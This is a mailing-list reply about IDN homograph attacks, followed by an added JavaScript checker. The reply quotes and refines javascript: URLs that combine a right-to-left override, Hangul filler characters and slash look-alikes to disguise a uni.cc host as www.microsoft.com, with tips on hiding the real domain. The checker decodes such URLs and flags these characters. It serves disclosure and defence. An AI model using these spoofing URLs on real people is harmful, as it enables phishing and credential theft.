Re: [idn] another homograph attack: BIDI char
Soobok Lee wrote:
> javascript:void(window.open(unescape("http://www.microsoft.com%u202e.uni.cc/%u1160%u1160%u1160"),"_self"))
>
>
You can add "%u2044" at the filepath part of the URL, which has no
length limit like the label part.
If you increase the number of %u1160 to 100, you can hide the "uni.cc" part
completely in most browsers.
I request MS's urgent actions.
javascript:void(window.open(unescape("http://www.microsoft.com%u202e.uni.cc/%u1160%u1160%u1160%u2044"),"_self"))
>
> If some IDNA implementation does not handle BIDI filtering/verifying
> well, you can see similar results as "slash-space combination".
> %u202e is a bidi directional formatter (RLO, right-to-left) and should
> not be filtered on a char-by-char basis, because the char
> plays a crucial role in Arabic/Hebrew writings. You can refer to
> stringprep/nameprep document for details of BIDI checking part.
>
> Good implementations of IDNA would not suffer from the above attack.
> But, current MSIE does not support IDNA, while it
> still allows arbitrary utf-8 chars. So, current MSIE is exploitable for
> malicious phishing attempts. I don't know whether this works
> for Firefox/Mozilla.
>
> The previous example,
> javascript:void(window.open(unescape("http://www.microsoft.com%u2044%u1160%u1160%u1160.uni.cc/"),"_self"))
>
> You can replace %u2044 with %u2205,%u3033 etc. I am now searching more
> slash/space like chars. I will post them here.
%u2205 ===> %u2215
Soobok
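
The check below is an added example, not part of the original message or of any browser's code. It decodes the %uXXXX escapes without navigating, shows which string is really the host (everything up to the first ASCII slash), and flags the code points named in this thread. The names LOOKALIKES, decodeLegacyEscapes, inspectUrl and visible are assumptions made for illustration.

```javascript
// Added example (not from the original message). All names are hypothetical.
// Code points named in this thread, with their Unicode character names.
const LOOKALIKES = new Map([
  [0x202e, "RIGHT-TO-LEFT OVERRIDE (reorders displayed text)"],
  [0x1160, "HANGUL JUNGSEONG FILLER (renders as blank space)"],
  [0x2044, "FRACTION SLASH (resembles '/')"],
  [0x2215, "DIVISION SLASH (resembles '/')"],
  [0x3033, "VERTICAL KANA REPEAT MARK UPPER HALF (resembles '/')"],
]);

// Decode %uXXXX and %XX as legacy unescape() would, without calling it.
function decodeLegacyEscapes(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

// Escape non-ASCII so a log line cannot itself be reordered by U+202E.
const visible = (s) => s.replace(/[^\x20-\x7e]/g,
  (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));

// Split off the host by hand: only ASCII '/', '?' or '#' ends the authority,
// so a slash look-alike stays inside the host however it is drawn.
function inspectUrl(raw) {
  const url = decodeLegacyEscapes(raw);
  const schemeEnd = url.indexOf("://");
  if (schemeEnd === -1) throw new Error("no scheme in URL");
  const start = schemeEnd + 3;
  const rel = url.slice(start).search(/[\/?#]/);
  const end = rel === -1 ? url.length : start + rel;
  const findings = [];
  for (let i = start; i < url.length; i++) {
    const cp = url.charCodeAt(i);
    if (!LOOKALIKES.has(cp)) continue;
    const codePoint = "U+" + cp.toString(16).toUpperCase().padStart(4, "0");
    findings.push({ codePoint, name: LOOKALIKES.get(cp), part: i < end ? "host" : "path" });
  }
  return { host: url.slice(start, end), findings };
}

// The two URLs posted in this thread, plus a clean one for comparison.
const samples = [
  "http://www.microsoft.com%u202e.uni.cc/%u1160%u1160%u1160%u2044",
  "http://www.microsoft.com%u2044%u1160%u1160%u1160.uni.cc/",
  "http://www.microsoft.com/",
];
for (const s of samples) {
  const r = inspectUrl(s);
  console.log(visible(r.host), r.findings.map((f) => `${f.codePoint}@${f.part}`).join(" "));
}
```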